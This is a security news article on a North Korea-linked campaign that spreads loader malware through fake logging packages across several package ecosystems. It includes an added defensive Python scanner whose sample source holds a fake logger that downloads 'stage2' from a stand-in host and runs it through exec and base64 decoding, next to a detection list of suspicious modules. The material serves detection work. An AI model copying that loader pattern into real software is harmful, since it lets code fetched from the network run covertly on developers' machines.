A large-scale software supply chain attack linked to North Korean threat actors has been uncovered, involving more than 1,700 malicious packages across multiple developer ecosystems, including npm, PyPI, Go, Rust, and Packagist.
The campaign, tracked as Contagious Interview, demonstrates a coordinated effort to infiltrate developer environments by disguising malware as legitimate development tools.
Security researchers from Socket revealed that these packages were crafted to mimic commonly used logging and utility libraries while secretly functioning as malware delivery mechanisms.
Multi-Ecosystem Supply Chain Compromise
The malicious packages were distributed across several popular programming ecosystems:
- npm packages such as dev-log-core and logger-base
- PyPI libraries including logutilkit and fluxhttp
- Go repositories hosted on GitHub
- Rust package logtrace
- Packagist package golangorg/logkit
This cross-platform approach significantly increases the attack surface, enabling threat actors to target developers working in different programming environments.
Hidden Malware Loaders and Stealth Execution
The primary purpose of these packages is to act as loaders that download second-stage malware tailored to the victim’s operating system.
Unlike typical malicious packages, the embedded code does not execute immediately upon installation. Instead, it is hidden within functions that appear legitimate and relevant to the package’s purpose.
For example, in the Rust package “logtrace,” malicious code is concealed within a logging function, making it difficult for developers to detect.
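The following is an added, defender-side example and is not code from the article or from Socket: a small Python AST heuristic that flags functions whose names suggest logging but whose bodies reach the network, decode data, or execute code, which is the hiding pattern the article describes. The sample package source it scans is constructed for the example.

```python
import ast
from typing import List, Tuple

# Modules a plain logging helper has no business reaching, plus builtins that
# turn fetched bytes into running code. A triage heuristic, not proof of malice.
SUSPICIOUS_MODULES = {"urllib", "requests", "subprocess", "socket", "base64", "ctypes"}
SUSPICIOUS_BUILTINS = {"exec", "eval", "compile", "__import__"}

def _dotted(func: ast.expr) -> str:
    """Render a call target such as urllib.request.urlopen as a dotted string."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""  # call on a call result, e.g. foo().bar(); not module-rooted

def find_loader_candidates(source: str) -> List[Tuple[str, int, str]]:
    """Return (function, line, call) for functions whose name suggests logging
    but whose body reaches the network, decodes data, or executes code."""
    hits = []
    for fn in ast.walk(ast.parse(source)):
        if not isinstance(fn, ast.FunctionDef) or "log" not in fn.name.lower():
            continue
        for node in ast.walk(fn):
            if not isinstance(node, ast.Call):
                continue
            target = _dotted(node.func)
            if target in SUSPICIOUS_BUILTINS or target.split(".")[0] in SUSPICIOUS_MODULES:
                hits.append((fn.name, node.lineno, target))
    return sorted(hits, key=lambda h: (h[1], h[2]))

# Constructed sample (not a real package) mimicking the pattern in the article:
# a logger that works as advertised but also stages and runs remote content.
SAMPLE = '''
import logging, base64, urllib.request

def log_message(msg):
    logging.info(msg)
    payload = urllib.request.urlopen("http://example.invalid/stage2").read()
    exec(base64.b64decode(payload))

def format_log(msg):
    return "[app] " + msg.strip()
'''

if __name__ == "__main__":
    for fn, line, call in find_loader_candidates(SAMPLE):
        print(f"{fn}:{line} reaches {call}")
```

Run it over the unpacked sources of a newly added dependency; a hit does not prove compromise, but a "logging" helper that opens sockets or calls exec deserves a manual look before the package enters a build.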
Advanced Data Theft and Remote Access Capabilities
Once activated, the malware delivers powerful capabilities, including:
- Extraction of browser data and saved credentials
- Access to password managers
- Theft of cryptocurrency wallet information
- Remote command execution
A Windows-specific variant delivered through “license-utils-kit” goes further by deploying a full-featured post-compromise implant capable of:
- Logging keystrokes
- Executing system commands
- Uploading and downloading files
- Terminating browser processes
- Installing AnyDesk for persistent remote access
- Creating encrypted archives
These features indicate a high level of sophistication and intent to maintain long-term access.
Growing Scale and Persistence of the Campaign
Since early 2025, researchers have identified over 1,700 malicious packages associated with this campaign, highlighting its scale and persistence.
The operation reflects a well-funded and strategically executed effort aimed at compromising software supply chains to gain initial access into developer systems for both espionage and financial theft.
Connection to Broader North Korean Cyber Operations
This activity is part of a wider pattern of cyber campaigns attributed to North Korean threat actors. One notable incident involved the compromise of the widely used Axios npm package, which was used to distribute malware after attackers gained control of the maintainer’s account through social engineering.
The campaign has been linked to a financially motivated threat group known as UNC1069, which overlaps with other known groups such as BlueNoroff, Sapphire Sleet, and Stardust Chollima.
Social Engineering and Fake Meeting Lures
Researchers from Security Alliance reported that attackers used sophisticated social engineering tactics to lure victims.
The group impersonates trusted contacts or well-known platforms like Microsoft Teams and Zoom, sending fake meeting invitations via channels such as Telegram, LinkedIn, and Slack.
These links lead to malicious pages that trigger malware execution, often using techniques similar to ClickFix-style attacks.
Delayed Execution Strategy for Maximum Impact
One notable tactic used by the attackers is delaying malicious activity after initial compromise. Victims often continue normal operations, unaware that their systems have already been breached.
This delay allows attackers to gather intelligence and maximize the effectiveness of their operations before detection.
Evolving Threat Landscape
Experts from Microsoft Threat Intelligence warn that North Korean cyber actors are continuously adapting their tools, infrastructure, and attack strategies.
They frequently use domains that mimic legitimate services, including financial institutions and video conferencing platforms, to enhance the credibility of their attacks.